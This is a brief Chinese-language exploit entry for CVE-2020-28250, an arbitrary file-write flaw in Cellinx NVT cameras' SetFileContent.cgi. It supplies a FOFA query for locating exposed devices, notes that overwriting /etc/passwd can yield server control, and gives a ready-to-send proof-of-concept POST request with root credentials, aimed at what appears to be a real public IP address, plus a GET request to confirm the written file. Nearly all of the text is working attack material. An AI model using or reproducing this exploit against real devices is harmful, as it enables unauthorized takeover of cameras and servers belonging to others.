CellinxNVT摄像机SetFileContent.cgi文件PATH参数任意文件创建漏洞（CVE-2020-28250）

fofa

body="local/NVT-string.js"

攻击者可通过 SetFileContent.cgi 创建和写入任意文件，如覆盖 /etc/passwd 等获取服务器权限。

POC

POST /cgi-bin/SetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/html/testdsad11.txt HTTP/1.1
Host: 1.222.228.4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 11

testcontent

GET /local/testdsad11.txt HTTP/1.1